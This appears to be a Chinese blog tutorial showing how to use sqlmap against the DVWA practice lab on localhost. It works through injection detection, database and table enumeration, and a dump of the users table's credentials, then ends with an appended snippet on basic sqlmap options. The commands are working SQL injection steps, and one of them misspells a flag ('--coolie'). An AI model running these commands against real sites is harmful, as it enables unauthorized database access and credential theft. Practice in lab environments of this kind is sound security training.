7.12、SQLmap—自动化渗透测试工具(kali linux)

目录

一、准备工作

二、检测漏洞

第一步:获取待检测的url

第二步:获取cookie

第三步:生成命令行

三、获取数据库名

四、获取指定数据库表

五、获取指定数据库列/表项

六、获取数据


        sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。

一、准备工作

       1)kali操作系统自带sqlmap,可以直接输入sqlmap执行。

        2)启动apache2和mysql服务

        service apache2 start        # 启动apache2
        service mysql start            # 启动mysql

        3)打开DVWA靶场,将防御等级设置为low

二、检测漏洞

        命令行:sqlmap -u "要检查的网址"  --cookie ="网站登录后,后端返回的cookie值 

        cookie:登录凭证

第一步:获取待检测的url

        http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

第二步:获取cookie

        回到DVWA按:F12  # 进入开发者模式

        security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2

第三步:生成命令行

        该命令行输入到虚拟机的命令框中务必自己输入,不要复制粘贴!!!

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --coolie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2"

三、获取数据库名

        在第一步检测的的命令后面加上:--dbs     

        dbs:database server获取所有数据库名

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" --dbs

四、获取指定数据库表

        在第一步检测的的命令后面加上:-D 数据库名称 --tables         

        -D(Database)指定想要获取的数据库名

        --tables 枚举(遍历)DBMS数据库中的表

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa --tables  

五、获取指定数据库列/表项

        在第一步检测的的命令后面加上:-D 数据库名 -T 数据库的表名 --columns  

        --columns 列出表项/例

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --columns 

六、获取数据

        把第五步命令后面的--columns换成:--dump  # 读取数据

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --dump

很慢~,等待中ing

爆破到dvwa数据库中user表的用户名及密码,结束!

  • 30
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
以下是使用Kali Linuxsqlmap的一些基本操作: 1. 首先,你可以使用命令`sqlmap --version`来查看sqlmap的版本号。 2. 如果你需要查看sqlmap的帮助信息,可以使用命令`sqlmap -h`。这将显示基本的帮助信息,包括命令选项和参数的说明。 3. 如果你需要查看更详细的高级帮助信息,你可以使用命令`sqlmap -hh`。这将显示更多的选项和参数以及其用法的详细说明。 4. 如果你想对向后台查询的GET请求进行注入测试,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询"`。这将对指定的URL进行注入测试,并尝试发现任何可能的SQL注入漏洞。 5. 如果你想列出数据库名称,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询" -dbs`。这将列出找到的所有数据库名称。 请注意,使用sqlmap进行SQL注入测试时要格外小心,确保你有合法的授权和权限,并且只在你有合法访问权限的系统上进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [kali linuxsqlmap使用教程](https://blog.csdn.net/weixin_52084568/article/details/123839776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [kali工具SQLmap基本使用方法流程以及命令解析](https://blog.csdn.net/FRANXX_02/article/details/127180052)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网运少年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值